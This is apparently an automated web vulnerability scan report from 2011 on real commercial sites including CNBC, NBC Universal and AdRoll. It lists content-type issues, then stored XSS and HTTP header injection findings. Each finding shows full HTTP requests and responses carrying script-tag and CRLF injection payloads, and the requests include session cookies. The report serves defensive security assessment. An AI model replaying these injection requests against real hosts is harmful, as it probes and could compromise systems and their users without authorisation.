29.76. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif

29.77. http://www.rayalab.com/Scripts/AC_RunActiveContent.js

29.78. http://www.rayalab.com/animate.js

29.79. http://www.rayalab.com/favicon.ico

29.80. http://www.rayalab.com/flexcroll.js

29.81. http://www.resourcepoint.net/form.htm

29.82. http://www.revsolutionsinc.com/animated_favicon1.gif

29.83. http://www.sophelle.com/graphic/bullet-sm-w.gif

29.84. http://www.sophelle.com/images/sophelle-ico.ico

30. HTML uses unrecognised charset

31. Content type incorrectly stated

31.1. http://4qinvite.4q.iperceptions.com/1.aspx

31.2. http://a1.interclick.com/getInPageJS.aspx

31.3. http://a1.interclick.com/getInPageJSProcess.aspx

31.4. https://account.bigcommerce.com/mailer/form.php

31.5. http://ad.doubleclick.net/clk

31.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534**

31.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**

31.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154**

31.9. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**

31.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**

31.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**

31.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**

31.13. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**

31.14. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005**

31.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**

31.16. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**

31.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**

31.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**

31.19. http://ads.pointroll.com/PortalServe/

31.20. http://api-cdn.cnbc.com/api/chart/chart.asp

31.21. http://api.cnbc.com/api/chart/chart.asp

31.22. http://api.viglink.com/api/ping

31.23. http://apps.cnbc.com/Includes/CheckPng/Script.asp

31.24. http://assets1.csc.com/contact_us/media/contact_us4.css

31.25. http://assets1.csc.com/services/media/services3.css

31.26. http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-getkey.php

31.27. http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-js.php

31.28. http://blog.harbottle.com/dm/xmlrpc.php

31.29. http://blogs.oracle.com/main/resource/resources/ora_code_blogs.js

31.30. http://blogs.oracle.com/otn/resource/1OTN-2col/OTNHead-Short.png

31.31. http://blogs.oracle.com/otn/resource/SunOracle.png

31.32. http://blogs.oracle.com/otn/resource/java-logo.png

31.33. http://blogs.oracle.com/theme/scripts/clientSideInclude.js

31.34. http://blogs.oracle.com/theme/scripts/roller.js

31.35. http://content.plymedia.com/initialize

31.36. http://dynpages-mktas.oracle.com/pls/ebn/swf_viewer.load

31.37. http://education.oracle.com/education/css/oracle.css

31.38. http://education.oracle.com/pls/web_prod-plq-dad/Webreg_Search_Results.get_countries

31.39. https://event.on24.com/eventRegistration/prereg/register.jsp

31.40. https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg

31.41. https://forums.oracle.com/forums/themes/english/resources/info_company.gif

31.42. https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif

31.43. https://forums.oracle.com/forums/themes/english/resources/otn_new.css

31.44. https://forums.oracle.com/forums/themes/english/resources/s_code.js

31.45. https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js

31.46. https://forums.oracle.com/forums/themes/english/resources/spacer.gif

31.47. https://forums.oracle.com/forums/themes/english/resources/style.css

31.48. http://goku.brightcove.com/1pix.gif

31.49. http://imp.fetchback.com/serve/fb/adtag.js

31.50. http://l.apture.com/v3/

31.51. http://m.cnbc.com/mytest/ipecho.php

31.52. http://media.cnbc.com/i/CNBC/CNBC_Images/video/cur_video_share.jpg/

31.53. http://media.cnbc.com/i/CNBC/CNBC_Images/video/cur_video_share_over.jpg/

31.54. http://media.cnbc.com/i/CNBC/CNBC_Images/video/vid_control_/

31.55. http://media.cnbc.com/i/CNBC/Components/FlashVideo/flashVideoPlayerv81

31.56. http://media.cnbc.com/i/CNBC/Components/FlashVideo/inline/flashVideoPlayerv14

31.57. http://media.cnbc.com/j/CNBC/Sections/News_And_Analysis/__Story_Inserts/graphics/__PEOPLE/R/ROUBINI_NOURIEL/nouriel

31.58. https://myprofile.oracle.com/EndUser/images/fading-background.png

31.59. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png

31.60. https://myprofile.oracle.com/EndUser/jscripts/s_code.js

31.61. https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js

31.62. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js

31.63. https://myprofile.oracle.com/EndUser/jscripts/s_validation.js

31.64. http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www

31.65. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard

31.66. http://now.eloqua.com/visitor/v200/svrGP.aspx

31.67. https://oracleus.wingateweb.com/portal/dwr/interface/PortalAjax.js

31.68. http://ping.crowdscience.com/ping.js

31.69. http://pixel.fetchback.com/serve/fb/pdc

31.70. https://register.cnbc.com/RandomImage.jsp

31.71. http://rt.disqus.com/forums/realtime-cached.js

31.72. http://rt.legolas-media.com/lgrt

31.73. http://rww.readwriteweb.netdna-cdn.com/favicon.ico

31.74. http://s7.addthis.com/js/addthis_widget.php

31.75. http://server.iad.liveperson.net/hcp/html/mTag.js

31.76. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

31.77. http://sophelle.app5.hubspot.com/salog.js.aspx

31.78. http://subplyevents.cloudapp.net/AddEvent.aspx/061BB857AFEC5D2E9B3ACD2683E66EA8B0CF3633/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

31.79. http://subplyevents.cloudapp.net/AddEvent.aspx/0CE9D6956B7A0FCD1E99F1E8A802B1EDB8F1B59A/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

31.80. http://subplyevents.cloudapp.net/AddEvent.aspx/1B862009340CE9937F3D91AB6CCA134E42777EEE/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

31.81. http://subplyevents.cloudapp.net/AddEvent.aspx/DA52446C4D2F6699FE9CD584FA3631B533E893CE/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

31.82. http://tps31.doubleverify.com/visit.js

31.83. http://wd.sharethis.com/api/getCount2.php

31.84. http://www.atg.com/favicon.ico

31.85. http://www.atg.com/svc-common/script/propertyFunc.js.jsp

31.86. https://www.atg.com/favicon.ico

31.87. https://www.atg.com/svc-common/script/propertyFunc.js.jsp

31.88. http://www.cnbc.com/id/24596694/

31.89. http://www.facebook.com/extern/login_status.php

31.90. http://www.fekkai.com/js/imageLoader.json

31.91. http://www.gillettevenus.com/favicon.ico

31.92. http://www.google.com/cse/api/008313234753726960933/cse/s6m3qtfkxlu/queries/js

31.93. http://www.google.com/search

31.94. http://www.harbottle.com/favicon.ico

31.95. http://www.marykay.com/images/icn_fb.jpg

31.96. http://www.marykay.com/images/icn_yt.jpg

31.97. http://www.netsuite.com/portal/javascript/effects.js

31.98. http://www.netsuite.com/portal/javascript/prototype.js

31.99. http://www.oracle.com/ocom/groups/public/@ocompublic/documents/digitalasset/392683.jpg

31.100. http://www.oracle.com/ocom/groups/public/@ocompublic/documents/digitalasset/420729.jpg

31.101. http://www.oracle.com/ocom/groups/public/@ocompublic/documents/digitalasset/461037.jpg

31.102. http://www.oracle.com/pls/ebn/live_viewer.main

31.103. http://www.oracle.com/pls/ebn/swf_viewer.load

31.104. http://www.oracle.com/pls/ebn/wm_viewer.main

31.105. http://www.sophelle.com/graphic/cq_logo-250.gif

32. Content type is not specified

32.1. http://ads.pointroll.com/PortalServe/

32.2. https://login.oracle.com/mysso/sso_loginui/moc_lib.js

32.3. https://login.oracle.com/mysso/sso_loginui/sso_check.js

32.4. https://login.oracle.com/oam/server/sso/auth_cred_submit

32.5. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

32.6. http://www.deloitte.com/deloitte-portal-selfservice/jquery.showLoading.js

32.7. http://www.deloitte.com/deloitte-portal-selfservice/scripts/checkbox-style.js

32.8. http://www.deloitte.com/deloitte-portal-selfservice/selfservice-api.js


1. Cross-site scripting (stored)

Summary

Severity:   High
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the JSESSIONID cookie submitted to the URL /snas/api/getRemoteDomainCookies is copied into the HTML document as plain text between tags at the URL /snas/api/getRemoteDomainCookies. The payload a5fc9<script>alert(1)</script>0f409039ab9 was submitted in the JSESSIONID cookie. This input was returned unmodified in a subsequent request for the URL /snas/api/getRemoteDomainCookies.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request 1

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://data.cnbc.com/quotes/.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27331A26051D3991-6000010800171907[CE]; JSESSIONID=6D56CDC00D764468C0E55EBDC52CFB15a5fc9<script>alert(1)</script>0f409039ab9

Request 2

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://data.cnbc.com/quotes/.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27331A26051D3991-6000010800171907[CE]; JSESSIONID=6D56CDC00D764468C0E55EBDC52CFB15

Response 2

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:11:11 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=6D56CDC00D764468C0E55EBDC52CFB15a5fc9<script>alert(1)</script>0f409039ab9; Path=/
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:11:21 GMT
Content-Length: 208
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"6D56CDC00D764468C0E55EBDC52CFB15a5fc9<script>alert(1)</script>0f409039ab9","s_vi":"[CS]v1|27331A26051D3991-6000010800171907[CE]"}});

2. HTTP header injection
There are 8 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 752c7%0d%0afa8ce4cf6fd was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /pixel/752c7%0d%0afa8ce4cf6fd/3CUMSMM7PFGSTPKIXDFOOO?pv=98794510029.25635&cookie=&keyw=ATG+e-commerce+solutio HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Tue, 06 Sep 2011 15:32:47 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001afb11%00%0d%0a1aa9599e8bf; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/752c7
fa8ce4cf6fd
/3CUMSMM7PFGSTPKIXDFOOO/4X7ERY5MVFDBLHMTRJRP2G.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


2.2. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 36bd2%0d%0a9786dda38d3 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /pixel/EBPLYDUJ5RCZ3C7MBENLBV/36bd2%0d%0a9786dda38d3?pv=98794510029.25635&cookie=&keyw=ATG+e-commerce+solutio HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Tue, 06 Sep 2011 15:32:48 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001afb11%00%0d%0a1aa9599e8bf; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/retarget/EBPLYDUJ5RCZ3C7MBENLBV/36bd2
9786dda38d3
/pixel.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


2.3. http://login.cnbc.com/tpauth/rest/authenticate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.cnbc.com
Path:   /tpauth/rest/authenticate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 294ce%0d%0adc6a298c2de was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /tpauth/rest/authenticate?source=subscription&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&294ce%0d%0adc6a298c2de=1 HTTP/1.1
Host: login.cnbc.com
Proxy-Connection: keep-alive
Referer: http://pro.cnbc.com/index.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; TZM=-300; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:03:29 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: JSESSIONID=D2C022C9CFF6DFB9157CD240DA8DE1A9; Path=/tpauth
Location: https://login.cnbc.com/cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&294ce
dc6a298c2de
=1&login_view=subscription
Content-Length: 0
Content-Type: text/plain


2.4. http://login.cnbc.com/tpauth/rest/authenticate [source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.cnbc.com
Path:   /tpauth/rest/authenticate

Issue detail

The value of the source request parameter is copied into the Location response header. The payload 33200%0d%0a0f3f561d3b4 was submitted in the source parameter. This caused a response containing an injected HTTP header.

Request

GET /tpauth/rest/authenticate?source=33200%0d%0a0f3f561d3b4&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp HTTP/1.1
Host: login.cnbc.com
Proxy-Connection: keep-alive
Referer: http://pro.cnbc.com/index.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; TZM=-300; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:03:00 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Location: https://login.cnbc.com/cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=33200
0f3f561d3b4

Content-Length: 0
Content-Type: text/plain


2.5. https://register.cnbc.com/memberCenter.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /memberCenter.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 4ef6d%0d%0a743079059dd was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /memberCenter.do?4ef6d%0d%0a743079059dd=1 HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:05:52 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&4ef6d
743079059dd
=1&login_view=register
Content-Length: 0
Connection: close
Content-Type: text/plain
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:52 GMT; path=/


2.6. https://register.cnbc.com/refreshlogin.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /refreshlogin.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload d0ea7%0d%0a3c7455c6879 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /refreshlogin.jsp?source=header&service=http://www.cnbc.com/&d0ea7%0d%0a3c7455c6879=1 HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; TZM=-300; JSESSIONID=30F7657E561A5A03E5B11ABE0843E7D5; s_cc=true; __qseg=Q_D; s_nr=1315339382427; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/%252523%2526ot%253DA; cnbc_regional_cookie=US

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:03:20 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header&d0ea7
3c7455c6879
=1&login_view=header
Content-Length: 0
Connection: close
Content-Type: text/plain
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:03:20 GMT; path=/


2.7. https://register.cnbc.com/refreshlogin.jsp [source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /refreshlogin.jsp

Issue detail

The value of the source request parameter is copied into the Location response header. The payload 42dc1%0d%0ad1b7bab4e94 was submitted in the source parameter. This caused a response containing an injected HTTP header.

Request

GET /refreshlogin.jsp?source=42dc1%0d%0ad1b7bab4e94&service=http://www.cnbc.com/ HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; TZM=-300; JSESSIONID=30F7657E561A5A03E5B11ABE0843E7D5; s_cc=true; __qseg=Q_D; s_nr=1315339382427; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/%252523%2526ot%253DA; cnbc_regional_cookie=US

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:03:19 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=42dc1%0D%0Ad1b7bab4e94&login_view=42dc1
d1b7bab4e94

Content-Length: 0
Connection: close
Content-Type: text/plain
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:03:19 GMT; path=/


2.8. https://register.cnbc.com/registerUser.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /registerUser.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload bc1b6%0d%0a38769824fca was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /registerUser.do?bc1b6%0d%0a38769824fca=1 HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:05:48 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: JSESSIONID=8949562430B64F70CC4A99E0D5131B41; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://register.cnbc.com/refreshlogin.jsp?bc1b6
38769824fca
=1
Content-Length: 0
Connection: close
Content-Type: text/html
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:48 GMT; path=/


3. Cross-site scripting (reflected)
There are 100 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

